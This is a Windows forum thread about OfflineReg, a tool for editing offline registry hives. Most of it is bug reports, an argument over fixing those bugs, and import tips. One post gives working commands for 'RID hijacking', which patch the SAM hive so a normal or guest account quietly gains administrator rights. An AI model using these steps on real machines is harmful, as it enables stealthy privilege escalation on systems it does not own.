You forgot to fix this one. Leftovers.
Edit: It seems to work fine.
Also reg.exe cannot be a replacement because it doesn't ignore permissions.
Edited by osfixer, 17 March 2019 - 03:21 PM.
Posted 17 March 2019 - 03:11 PM
You forgot to fix this one. Leftovers.
Edit: It seems to work fine.
Also reg.exe cannot be a replacement because it doesn't ignore permissions.
Edited by osfixer, 17 March 2019 - 03:21 PM.
Posted 19 March 2019 - 03:19 PM
What you could do also is add support for adjusting permissions.. for keys, values.
This could be done only through command line I think.
Does offlinereg respect inherited user? If process is launched with SYSTEM or TI token?
If it doesn't you can add /inherit switch..
DWORD ORAPI ORGetKeySecurity ( _In_ ORHKEY Handle, _In_ SECURITY_INFORMATION SecurityInformation, _Out_opt_ PSECURITY_DESCRIPTOR pSecurityDescriptor, _Inout_ PDWORD lpcbSecurityDescriptor ); DWORD ORAPI ORSetKeySecurity ( _In_ ORHKEY Handle, _In_ SECURITY_INFORMATION SecurityInformation, _In_ PSECURITY_DESCRIPTOR pSecurityDescriptor );
Edited by osfixer, 19 March 2019 - 03:25 PM.
Posted 24 March 2019 - 02:33 PM
Following a post here on how to blank an account's password using offlinereg, this time, lets see how to perform "RID hijacking".
The local admin account has a 01F4 rid.
What about "patching" another (non admin) account to replace its RID with 01F4?
rem notice the rid at offset 30h (here E803)
OfflineReg-win32 "c:\windows\system32\config\SAM" sam\domains\account\users\000003e8 getvalue f
rem lets write f401 (admin rid) at offset 30h (48 in decimal form)
OfflineReg-win32 "c:\windows\system32\config\SAM" sam\domains\account\users\000003e8 setvaluebyteat f 244 48
OfflineReg-win32 "c:\windows\system32\config\SAM" sam\domains\account\users\000003e8 setvaluebyteat f 1 49
Now you should be able to restart your system, log in with this user account and actually perform admin task.
This is quite "stealthy" as the account will still not be part of the local admin group while being able to perform admin tasks.
LSASS trust SAMSRV and SAMSRV trust the registry : everyone is happy...
This can work with the guest account as well.
I tested this with success from a winpe against windows 10.
Posted 24 March 2019 - 02:55 PM
This can work with the guest account as well.
Nice
And once again all it can be used to prevent a hypothetical intruder (with limited physical access[1]) from pwning your system is only the BIOS password (and possibly disk encryption, please read as "the surest way to lose all your data, before or later").
Wonko
[1] i.e. sitting in front of your PC but not having the time/opportunity to disassemble it
Posted 24 March 2019 - 03:04 PM
Nice
And once again all it can be used to preent a hypothetical intruder (with limited physical access[1]) from pwning your system is only the BIOS password (and possibly disk encryption, please read as "the surest way to lose all your data, before or later").
Wonko
[1] i.e. sitting in front of your PC but not having the time/opportunity to disassemble it
Absolutely agree.
Bios is a bit extreme in a corporate environement as you cannot ask users to remember/type the bios password but is perfectly valid in a home environement.
Disk encryption like bitlocker adresses a lot of these "local" attacks although I feel bitlocker could shortly be broken without even having to get the key from the TPM chip...
Posted 24 March 2019 - 03:12 PM
Bios is a bit extreme in a corporate environement as you cannot ask users to remember/type this password but is perfectly valid in a home environement.
I don't see how you can ask an user to remember his Windows login password[1] but not the BIOS one in a corporate environment.
Wonko
[1] and usually another 3 to 15 passwords[2] to different corporate accounts/services
[2] which are the actual use - besides the Windows login password - for the post-it in the top left drawer of the (corporate) desk.
Posted 24 March 2019 - 03:21 PM
I don't see how you can ask an user to remember his Windows login password[1] but not the BIOS one in a corporate environment.
Wonko
[1] and usually another 3 to 15 passwords[2] to different corporate accounts/services
[2] which are the actual use - besides the Windows login password - for the post-it in the top left drawer of the (corporate) desk.
I work in a big corp environement and it is alreay a PITA to enforce usernames which are vaguely connected to the actual user name (x letters for country code, x letters for division, x letters for first names, x letters for last name, etc ) thus witnessing regularly users who forget their username because it is so cryptic.
And then a 8+ password characters which has to include digits AND non alpha num chars with a policy preventing the use of the last 16 passwords...
That only is enough to keep dozens ot IT ppl busy every day
I can see the massive nervous breakdown it would be if we were to ask to remember the computer BIOS password.
Now, on a good side, in big corp environements, SSO/delegation makes is so that the user normally should only have to remember his unique LDAP credentials - with one major pitfall thus : if the user credentials gets compromised, all apps get compromised...
Security is a never ending discussion.
I like to play the red team sec guy - I really would not want to be a blue team sec guy
Posted 24 March 2019 - 03:33 PM
That only is enough to keep dozens ot IT ppl busy every day
I guess we have a different idea of what busy means (or maybe you have much better IT ppl than I ever met):
Usual activities of IT people I know:
1) Saying NO, it is NOT possible to whatever request
2) In a few cases say Yes, it is possible but we need six months time and hire an external programmer.
3) In all other cases do something (usually trivial) and make it seem like it is:
a. difficult
b. possibly very, very difficult
c. even better, very, very difficult AND tiring
Wonko
Posted 24 March 2019 - 03:45 PM
I guess we have a different idea of what busy means (or maybe you have much better IT ppl than I ever met):
...
Sounds like you have had bad experiences with IT departments
Running an IT dpt, I have a difference experience.
A good dpt will be organised in different levels using ITIL processes and based on a service catalog with SLA's :
-level 1 facing users with one task : solve the issue/address the request in less than 30 mns max with an objective of 60% of all tickets solved in L1
-level 2 specialised in different fields (networks, systems, etc) mainly focusing on more complex requests with an objective of 30% of all tickets solved in L2
-level 3 specialised in a field (network for example) AND a platform/solution (checkpoint/fortigate/etc) liaising with vendors/editors if it really needs
to
Each team needs to cascade proper documentation/delegation to other teams to ensure each team can deal with incidents/requests in a timely and efficient maneeer.
Now I am more into IT Ops and I appreciate that adressing new needs, specially around Apps, is quite different and possibly deals more with project management.
My wife works in a big company as well, is a user, not an IT person, and basically has the same feedback as you do which lead to nice discussions
Now, may be we deviated a bit from the original post: after all, this is only a few bytes updated in a file sitting on the local drive
Posted 24 March 2019 - 04:04 PM
My wife works in a big company as well, is a user, not an IT person, and basically has the same feedback as you do which lead to nice discussions
So you have two separate but concurrent reports by two people that - for different reasons - are by definition always right .
Your particular IT department is then definitely the exception that confirms the rule.
Now, may be we deviated a bit from the original post: after all, this is only a few bytes updated in a file sitting on the local drive
Agreed
Wonko
Posted 29 March 2019 - 06:11 PM
Found another bug. IMHO reg load/unload is way more reliable..
I've lost hope in this tool. Too many bugs.
offlinereg-win64 "H:\Windows\System32\config\SYSTEM" " " import secpol.reg [ControlSet001\Control\SecurePipeServers\Winreg\AllowedExactPaths] main error:Access violation
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurePipeServers\Winreg\AllowedExactPaths] "Machine"="" ; Network access: Remotely accessible registry paths (None). [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurePipeServers\Winreg\AllowedPaths] "Machine"="" ; Network access: Remotely accessible registry paths and subpaths (None).
Edited by osfixer, 29 March 2019 - 06:21 PM.
Posted 29 March 2019 - 06:54 PM
Found another bug. IMHO reg load/unload is way more reliable..
I've lost hope in this tool. Too many bugs.
Good news for you is that you dont have to use it : life is good !
It is not as if I had not warned you several times that i have put little efforts in the import command and thay you should prefer reg load/unload for this specific matter...
Posted 29 March 2019 - 06:55 PM
So you are intentionally not fixing bugs? That is really weird.
Posted 29 March 2019 - 06:56 PM
So you are intentionally not fixing bugs? That is really weird.
Not exactly.
I am intentionally defining my priorities.
Nothing wierd there : I believe all human beings do so.
Posted 29 March 2019 - 06:58 PM
That is a bad excuse, telling people not to use your tool.
But then again I am not surprised considering..
Edited by osfixer, 29 March 2019 - 06:58 PM.
Posted 29 March 2019 - 07:01 PM
That is a bad excuse, telling people not to use your tool.
But then again I am not surprised considering..
Lets stop the discussion there.
You dont like the tool? You know of other tools? All fine with me.
I am not asking for any credits but at the same time will not accept negative comments not will try to decrypt your under statements.
You have been gently warned.
Dont spoil my fun.
Posted 29 March 2019 - 07:04 PM
Instead of saying thanks for discovering your bugs in your software, you are
now saying sorry can't do. Heh.
Posted 30 March 2019 - 02:06 PM
@osfixer - I really don't know what your problem is or why you are giving erwan.l attitude. He creates tools for us to use for free out of kindness, he has a job to do like all of us, so can only devote limited time to these projects. Why not just be grateful for what he does. If it doesn't do what you want then use something else. All of us here on this forum appreciates the work others do, and understand it is a hobby or side projects, we don't demand fixes and then get stroppy when we don't like answers. Perhaps take your attitude elsewhere
@erwan.l - I personally thank you for all you do, and use some of your tools such as this which work well for me, I have always found you helpful and friendly, so just ignore comments from idiots like this who have no respect for the free tools you provide us with
Posted 25 April 2019 - 09:11 PM
Posted 29 April 2019 - 05:56 PM
Hey Misty,
Long time no see
Thanks for your kind words !
No worries : I have been almost 25 years on "the internet" (my kids laugh at me when I talk like that) and as long I can remember I have encountered "challenging" behaviors...
Thus, I am still there and having fun and I am planning on making it another 25 years (at least !).
Think about it, Wonko has been there since dos 3.1 (if not VAX.VMS) and he is still this charming guy we know of
If he can do it, I can do it
About versionning, well hopefully, Wonko miss that post and not comment on that one (...) but there is some hope : I am currently migrating as much code of possible to lazarus/freepascal and this new IDE gives me some more capabilities there.
In short, all binaries should see the build number increase auto, the software should also display the build number auto (getting it from the binary itself) - example here with vmount (lately migrated from delphi7 to FPC).
I will also stick to a version.txt containing some extra binary details.
And I may even go as far (as some other dev guys on this forum) as including the build number in the filename.
It could be a good idea to define our own standards here on this forum in a dedicated post.
There are some great experienced guys on this forum who could share their views there.
Regards,
Erwan
Posted 29 April 2019 - 07:46 PM
No worries : I have been almost 25 years on "the internet" (my kids laugh at me when I talk like that) a
Yeah, definitely kids today :
https://tinyapps.org..._in_my_day.html
About versionning, well hopefully, Wonko miss that post ...
... after 25 years are you still grasping at straws logical impossibilities?
and not comment on that one (...) but there is some hope
By pure chance, Wonko happens to be in exceptionally good mood today thus your request is exceptionally granted [1].
Wonko
[1]but this of course doesn't exclude the matter from future conversations on the public park bench
Posted 16 December 2019 - 09:18 PM
Just to let you know my findings with this fantastic tool from erwan.l
It works fine from the full OS or from a WinPE, in order to run some tests with it, from my full Win 7x64 I mounted by means of DismMountService an old boot.wim from my 7pe_amd64_E , to C:\temp folder, the idea was to copy to it wofadk.sys on Windows\System32\drivers folder and install the service to run wofadk.sys when booting from the WinPE.
This is reg file for wofadk.sys:
Then just copied the mentioned file to required location, and on an elevated command promt opened on same folder where offlinereg-win64 and WofAdk.reg are located, ran this command:
offlinereg-win64 "C:\temp\Windows\System32\config\system" "D:\Aplicaciones\offlinereg\WofAdk.reg" import WofAdk.reg
EDIT-1: It is better to use: offlinereg-win64 "C:\temp\Windows\System32\config\system" " " import WofAdk.reg
And it did its magic and all the reg was applied to the mounted boot.wim, then just to make sure all was done fine I opened the C:\temp\Windows\System32\config\system file with Offlinereg_Gui.exe and to my surprice all was copied from the reg file but the part related to:
"ImagePath"=hex(2):73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,44,00,\
52,00,49,00,56,00,45,00,52,00,53,00,5c,00,77,00,6f,00,66,00,61,00,64,00,6b,\
00,2e,00,73,00,79,00,73,00,00,00
Was not copied fine (maybe too long) as you can see on attached pictures, all that is only to say in hexadecimal = system32\DRIVERS\wofadk.sys
But by means of the GUI it was very easy to delete the two last lines and edit the ImagePath value to system32\DRIVERS\wofadk.sys, then just saved and it was all, of course reopened it to verify changes were done.
Then just dismounted the boot.wim committing changes.
To resume:
EDIT-2: (1) The cause of this issue was found by erwan.l, and there is an easy way to avoid it see:
From: http://reboot.pro/to...-13#entry213675
I believe the issue is either with crlf and/or the ucs-2 format (your file has "magical" chars $fffe at the start of the file which you can see in a hex editor).
Copy paste the below to fresh new text file and try again to exclude the ucs-2 issue (i.e do not use the reg file generated by regedit).
And my test using this recommendation: http://reboot.pro/to...-13#entry213678
And all worked fine see attached picture, so this means we can't use reg files generated by regedit or we need to do some trick to them before using, please explain me.
And the next test: http://reboot.pro/to...-13#entry213679
Answering myself: (after just testing the following)
If we copy the content of a reg file generated by regedit.exe to a new text file and then save it as xxxxx.reg, then it can be used without any problem on Offlinereg.
Then only to summarize: The reg import feature is working fine, when using the fixed reg file.
alacran
Edited by alacran, 21 December 2019 - 11:35 PM.
Issue fixed
Posted 16 December 2019 - 10:08 PM
Now my old 7pe_amd64_E is capable to apply by means of WinNTSetup the WIM (Index:X) image files on Wimboot or Compact mode. Without the need to rebuild it, as proved by the attached picture. Where we can see the wofadk service is running.
alacran
Posted 17 December 2019 - 09:04 AM
Try using the hex string without the \ (which means "new line" in .reg files but is not accepted normally in command line).
I.e. this:
"ImagePath"=hex(2):73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,44,00,\
52,00,49,00,56,00,45,00,52,00,53,00,5c,00,77,00,6f,00,66,00,61,00,64,00,6b,\
00,2e,00,73,00,79,00,73,00,00,00
may not work, but this:
"ImagePath"=hex(2):73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,44,00,52,00,49,00,56,00,45,00,52,00,53,00,5c,00,77,00,6f,00,66,00,61,00,64,00,6b,00,2e,00,73,00,79,00,73,00,00,00
should.
Wonko
Posted 17 December 2019 - 05:44 PM
Thanks Wonko I will try it the way you suggested and report back my findings.
alacran
0 members, 0 guests, 0 anonymous users